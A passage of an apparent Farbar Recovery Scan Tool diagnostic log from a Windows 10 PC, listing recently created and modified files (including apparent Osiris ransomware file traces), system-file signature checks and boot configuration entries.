2016-12-03 08:33 - 2016-12-03 08:33 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\buttonconverter.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00038128 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSSi_GPIO.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsUpdateElevatedInstaller.exe
2016-12-03 08:33 - 2016-12-03 08:33 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\TsUsbGD.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbuhci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00033552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbatt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00033280 _____ (Intel(R) Corporation) C:\WINDOWS\system32\Drivers\iagpio.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storvsc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\battc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fdc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthhfHid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wacompen.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbohci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\CmBatt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00029456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00028432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00027920 _____ (Mellanox) C:\WINDOWS\system32\Drivers\winmad.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbprint.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026896 _____ C:\WINDOWS\system32\Drivers\SDFRd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026896 _____ (Promise Technology, Inc.) C:\WINDOWS\system32\Drivers\stexstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\npsvctrig.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\flpydisk.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\VMBusHID.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\uefi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WSDScan.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\urschipidea.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\atapi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024280 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbuspipe.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BtaMPM.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00023312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\urssynopsys.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WSDPrint.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kdnic.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00022800 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdxata.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\genericusbfn.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\AcpiDev.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00018704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\isapnp.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wmiacpi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sfloppy.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsilog.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hyperkbd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00016704 _____ (Microsoft Corporation) C:\WINDOWS\system32\HalExtIntcLpioDMA.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\MTConfig.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00015120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelide.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpipmi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014656 _____ (Microsoft Corporation) C:\WINDOWS\system32\HalExtPL080.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00014608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msisadrv.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WindowsTrustedRTProxy.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\swenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\umpass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\errdev.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpitime.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmgencounter.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serscan.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpipagr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00012560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciide.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00012048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volume.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00011992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\drmkaud.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CIRCoInst.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00011536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spacedump.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmgid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00009728 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\bcmfn2.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vms3cap.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00001913 _____ C:\WINDOWS\system32\@WindowsUpdate.240.png
2016-12-03 08:27 - 2016-12-28 22:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2c46be4)
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2c1371c)
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2bea754)
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2a5572c)
2016-12-03 02:55 - 2017-01-24 11:52 - 00000000 ____D C:\Windows
2016-12-03 02:55 - 2017-01-24 11:36 - 00000000 ____D C:\WINDOWS\System32
2016-12-03 02:55 - 2017-01-24 11:31 - 16777216 _____ C:\WINDOWS\system32\config\SYSTEM
2016-12-03 02:55 - 2017-01-24 11:31 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2016-12-03 02:55 - 2017-01-24 11:31 - 00524288 _____ C:\WINDOWS\system32\config\DEFAULT
2016-12-03 02:55 - 2017-01-24 11:31 - 00057344 _____ C:\WINDOWS\system32\config\SECURITY
2016-12-03 02:55 - 2017-01-24 10:44 - 00000000 ____D C:\WINDOWS\SysWOW64
2016-12-03 02:55 - 2017-01-24 10:24 - 06029312 _____ C:\WINDOWS\system32\config\DRIVERS
2016-12-03 02:55 - 2017-01-23 18:42 - 00000000 __RHD C:\Users\Default
2016-12-03 02:55 - 2017-01-06 13:46 - 29622272 _____ C:\WINDOWS\system32\config\COMPONENTS
2016-12-03 02:55 - 2017-01-04 15:32 - 00000000 ____D C:\WINDOWS\WinSxS
2016-12-03 02:55 - 2017-01-03 12:24 - 00000000 ____D C:\WINDOWS\system32\config
2016-12-03 02:55 - 2017-01-02 16:49 - 00069632 _____ C:\WINDOWS\system32\config\SAM
2016-12-03 02:55 - 2016-12-26 08:52 - 00000000 ____D C:\WINDOWS\Logs
2016-12-03 02:55 - 2016-12-23 12:22 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-03 02:55 - 2016-12-21 19:51 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-12-03 02:55 - 2016-12-21 19:34 - 00000000 ___RD C:\Users
2016-12-03 02:55 - 2016-12-21 19:30 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-12-03 02:55 - 2016-12-03 09:52 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-12-03 02:55 - 2016-12-03 09:52 - 00000000 ____D C:\WINDOWS\servicing
2016-12-03 02:55 - 2016-12-03 08:42 - 00000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2016-12-03 02:55 - 2016-12-03 08:42 - 00000000 ____D C:\WINDOWS\system32\CatRoot
2016-12-03 02:55 - 2016-12-03 08:42 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2016-12-03 02:55 - 2016-12-03 02:56 - 00053743 _____ C:\GLOB(0x22b727c)
2016-12-03 02:55 - 2016-12-03 02:56 - 00004184 _____ C:\GLOB(0x210727c)
2016-12-03 02:55 - 2016-12-03 02:56 - 00003546 _____ C:\GLOB(0x231727c)
2016-12-03 02:55 - 2016-12-03 02:56 - 00003414 _____ C:\GLOB(0x22e727c)
2016-12-03 02:55 - 2016-12-03 02:55 - 20971520 ___SH C:\WINDOWS\system32\config\SOFTWARE.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 16416768 ___SH C:\WINDOWS\system32\config\SOFTWARE.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 07340032 ___SH C:\WINDOWS\system32\config\COMPONENTS.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 02760704 ___SH C:\WINDOWS\system32\config\SYSTEM.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 02621440 ___SH C:\WINDOWS\system32\config\SYSTEM.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 01040384 ___SH C:\WINDOWS\system32\config\DRIVERS.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00903952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00860432 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmiEngine.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00524288 ___SH C:\WINDOWS\system32\config\BBI{120e2566-b936-11e6-a947-e41d2d740e30}.TMContainer00000000000000000002.regtrans-ms
2016-12-03 02:55 - 2016-12-03 02:55 - 00524288 ___SH C:\WINDOWS\system32\config\BBI{120e2566-b936-11e6-a947-e41d2d740e30}.TMContainer00000000000000000001.regtrans-ms
2016-12-03 02:55 - 2016-12-03 02:55 - 00319488 ___SH C:\WINDOWS\system32\config\BBI.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00280336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdscore.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\PkgMgr.exe
2016-12-03 02:55 - 2016-12-03 02:55 - 00212992 ___SH C:\WINDOWS\system32\config\BBI.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00149264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2016-12-03 02:55 - 2016-12-03 02:55 - 00131856 _____ (Microsoft Corporation) C:\WINDOWS\system32\SSShim.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00131072 ___SH C:\WINDOWS\system32\config\DEFAULT.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetDriverInstall.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2016-12-03 02:55 - 2016-12-03 02:55 - 00098304 ___SH C:\WINDOWS\system32\config\DEFAULT.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SECURITY.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SECURITY.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SAM.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SAM.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\BBI{120e2566-b936-11e6-a947-e41d2d740e30}.TM.blf
2016-12-03 02:55 - 2016-12-03 02:55 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00008192 ___SH C:\WINDOWS\system32\config\COMPONENTS.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ___SH C:\WINDOWS\system32\config\ELAM.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ___SH C:\Users\Default\NTUSER.DAT.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ___SH C:\Users\Default\NTUSER.DAT.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ____D C:\WINDOWS\system32\SMI
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ____D C:\WINDOWS\system32\downlevel
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2c4c6e4)
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2c1d23c)
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2bed23c)
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2a5921c)
2016-11-21 16:04 - 2016-11-21 16:04 - 00002087 _____ C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
2016-11-21 16:01 - 2017-01-12 13:58 - 00000000 ____D C:\Users\nepta\Downloads\HP Downloads
2016-11-21 15:58 - 2016-11-21 15:58 - 00000000 ____D C:\Users\nepta\Documents\HpReg_Backup
2016-11-19 12:50 - 2016-11-19 12:50 - 00019083 _____ C:\Users\nepta\Documents\WIN-9VDBKK3EQVE.speccy
2016-11-19 12:48 - 2016-12-21 19:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy
2016-11-19 12:47 - 2016-11-19 12:48 - 06290016 _____ (Piriform Ltd) C:\Users\nepta\Downloads\spsetup130.exe
2016-11-19 12:46 - 2016-11-19 12:48 - 00000839 _____ C:\Users\Public\Desktop\Speccy.lnk
2016-11-19 12:46 - 2016-11-19 12:46 - 00000000 ____D C:\Program Files\Speccy
2016-11-19 12:43 - 2016-11-19 12:45 - 05201280 _____ (Piriform Ltd) C:\Users\nepta\Downloads\spsetup129.exe
2016-11-19 12:06 - 2016-11-19 12:06 - 00000000 ___HD C:\$SysReset
2016-11-12 15:03 - 2016-11-12 15:03 - 15564308 _____ C:\Users\nepta\Downloads\haidt.APA-2016-lecture-on-polarization.for-posting.compressed.pptx.crdownload
2016-11-05 04:36 - 2016-12-21 19:48 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-11-05 04:27 - 2016-11-05 04:27 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShieldProviderService.exe
2016-11-05 04:27 - 2016-11-05 04:27 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\DefenderShield.dll
2016-11-05 04:27 - 2016-11-05 04:27 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.WelcomeScreen.dll
2016-11-05 04:27 - 2016-11-05 04:27 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShieldProviderProxyStub.dll
2016-11-05 04:26 - 2016-11-05 04:26 - 01812219 ____N C:\WINDOWS\system32\ActionCenterWelcomeImage.png
2016-11-05 04:26 - 2016-11-05 04:26 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.WelcomeScreen.dll
2016-11-05 04:26 - 2016-11-05 04:26 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2016-11-05 04:26 - 2016-11-05 04:26 - 00000639 ____N C:\WINDOWS\system32\@ActionCenterToastIcon.png
2016-11-05 04:25 - 2016-11-05 04:25 - 18491904 _____ (Microsoft Corporation) C:\WINDOWS\system32\HydrogenCompositor.dll
2016-11-04 13:16 - 2016-10-31 05:15 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-11-04 13:16 - 2016-10-31 04:29 - 00192000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-11-03 08:55 - 2016-12-21 19:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
2016-10-27 13:09 - 2016-12-21 19:39 - 00000000 ____D C:\Users\nepta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Xmarks
2016-10-27 13:09 - 2016-10-27 13:09 - 00000000 ____D C:\Program Files (x86)\Xmarks

==================== Three Months Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-24 14:24 - 2015-07-09 13:18 - 00000000 ____D C:\AdwCleaner
2017-01-24 12:29 - 2015-10-19 15:25 - 00093480 _____ C:\Users\nepta\AppData\Local\GDIPFONTCACHEV1.DAT
2017-01-24 11:29 - 2015-11-04 15:18 - 00000000 ____D C:\Users\nepta\AppData\Local\Xmarks
2017-01-24 10:44 - 2015-10-22 12:19 - 00002211 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Belarc Advisor.lnk
2017-01-24 10:41 - 2016-08-15 18:17 - 00000000 ____D C:\Program Files\SUPERAntiSpyware
2017-01-24 10:37 - 2015-10-20 15:26 - 00000000 ____D C:\Users\nepta\AppData\Roaming\KeePass
2017-01-24 10:24 - 2015-10-19 14:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2017-01-24 10:23 - 2016-03-19 10:15 - 00000000 ____D C:\WINDOWS\ShellNew
2017-01-24 08:53 - 2016-08-28 06:04 - 00000000 ____D C:\ProgramData\FitbitConnect
2017-01-23 18:42 - 2015-06-29 08:54 - 00000000 ____D C:\Users\nepta\Desktop\Retrieved
2017-01-23 18:40 - 2015-12-02 19:08 - 00000000 ____D C:\Users\nepta\Desktop\Steph's Work Folder
2017-01-23 18:36 - 2016-06-30 08:33 - 00000000 ____D C:\Users\nepta\Downloads\Drawing Programs
2017-01-23 18:27 - 2015-08-25 19:18 - 00000000 ____D C:\Users\nepta\Desktop\Stacee Work Folder
2017-01-23 18:22 - 2016-06-03 15:45 - 00000000 ____D C:\Users\nepta\Desktop\Finances
2017-01-23 18:22 - 2015-09-06 12:10 - 00000000 ____D C:\Users\nepta\Desktop\Menues
2017-01-23 18:22 - 2011-02-11 10:32 - 00000000 __RHD C:\SYSTEM.SAV
2017-01-23 18:22 - 2011-02-11 10:32 - 00000000 ____D C:\SWSETUP
2017-01-23 18:21 - 2016-04-26 16:58 - 00000000 ____D C:\Users\Public\Documents\Wondershare
2017-01-23 18:21 - 2013-08-22 14:37 - 00000000 ____D C:\GRAPHPAP
2017-01-23 18:20 - 2016-07-23 10:57 - 00000000 ____D C:\Users\nepta\Documents\City Application
2017-01-23 18:20 - 2015-11-05 13:15 - 00000000 ____D C:\Users\nepta\Documents\pixie
2017-01-23 18:20 - 2014-10-26 14:07 - 00000000 ____D C:\RecoveryImage
2017-01-23 18:18 - 2016-04-10 17:30 - 00000000 ____D C:\Users\nepta\Documents\Finances Stephanie
2017-01-19 13:06 - 2016-01-21 11:30 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-01-18 13:25 - 2015-10-20 12:41 - 00000442 _____ C:\Users\nepta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\My Passport (K).lnk
2017-01-10 13:21 - 2015-10-20 11:13 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-01-10 13:19 - 2016-08-14 15:36 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-01-10 13:18 - 2015-10-20 11:13 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-01-09 13:03 - 2015-10-19 16:09 - 00000167 _____ C:\WINDOWS\win.ini
2017-01-09 09:43 - 2015-10-21 15:41 - 00001192 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeePass 2.lnk
2017-01-09 09:43 - 2015-10-21 15:41 - 00000000 ____D C:\Program Files (x86)\KeePass Password Safe 2
2017-01-02 16:55 - 2016-06-23 16:45 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware

==================== Files in the root of some directories =======

2016-10-01 17:39 - 2016-10-01 17:39 - 0038411 _____ () C:\Users\nepta\AppData\Roaming\Microsoft Excel 97-2003.ADR
2016-10-01 17:34 - 2016-11-29 15:26 - 0009301 _____ () C:\Users\nepta\AppData\Roaming\Microsoft Excel 97-2003.EML
2016-04-09 08:14 - 2016-04-09 08:14 - 0000017 _____ () C:\Users\nepta\AppData\Local\resmon.resmoncfg
2017-01-23 18:21 - 2017-01-23 18:21 - 0003592 _____ () C:\ProgramData\346FD420--07CA--C4B7--4928A8E6--FA91EDB292F1.osiris
2015-11-05 18:28 - 2015-11-05 18:28 - 0000057 _____ () C:\ProgramData\Ament.ini
2017-01-23 18:21 - 2017-01-23 18:21 - 0008182 _____ () C:\ProgramData\OSIRIS-a761.htm

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume1
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
flightsigning           Yes
default                 {current}
resumeobject            {04d461d9-c7f6-11e6-8d9d-9dd2077c58d7}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 0

Windows Boot Loader
-------------------
identifier              {01381978-4adb-11e5-90ec-a1eca10b6741}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{01381979-4adb-11e5-90ec-a1eca10b6741}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{01381979-4adb-11e5-90ec-a1eca10b6741}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \WINDOWS\system32\winload.exe
description             Windows 10
locale                  en-US
inherit                 {bootloadersettings}
recoverysequence        {84377094-c7f6-11e6-8d9d-9dd2077c58d7}
displaymessageoverride  Recovery
recoveryenabled         Yes
flightsigning           Yes
allowedinmemorysettings 0x15000075
osdevice                partition=C:
systemroot              \WINDOWS
resumeobject            {04d461d9-c7f6-11e6-8d9d-9dd2077c58d7}
nx                      OptIn
bootmenupolicy          Standard

Windows Boot Loader
-------------------
identifier              {07f471a3-3b00-11e1-8ee8-d0df9ade1364}
device                  ramdisk=[D:]\Recovery\WindowsRE\Winre.wim,{07f471a4-3b00-11e1-8ee8-d0df9ade1364}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[D:]\Recovery\WindowsRE\Winre.wim,{07f471a4-3b00-11e1-8ee8-d0df9ade1364}
systemroot              \windows
nx                      OptIn
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {0a3beb22-9fbe-11e5-bc98-a742e1ee1e86}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0a3beb23-9fbe-11e5-bc98-a742e1ee1e86}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0a3beb23-9fbe-11e5-bc98-a742e1ee1e86}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {0bc6c150-5d4e-11e4-b3b5-8fd73e18ab92}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0bc6c151-5d4e-11e4-b3b5-8fd73e18ab92}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0bc6c151-5d4e-11e4-b3b5-8fd73e18ab92}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {1817421a-fe03-11e5-a48d-a04756c6d275}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1817421b-fe03-11e5-a48d-a04756c6d275}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1817421b-fe03-11e5-a48d-a04756c6d275}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
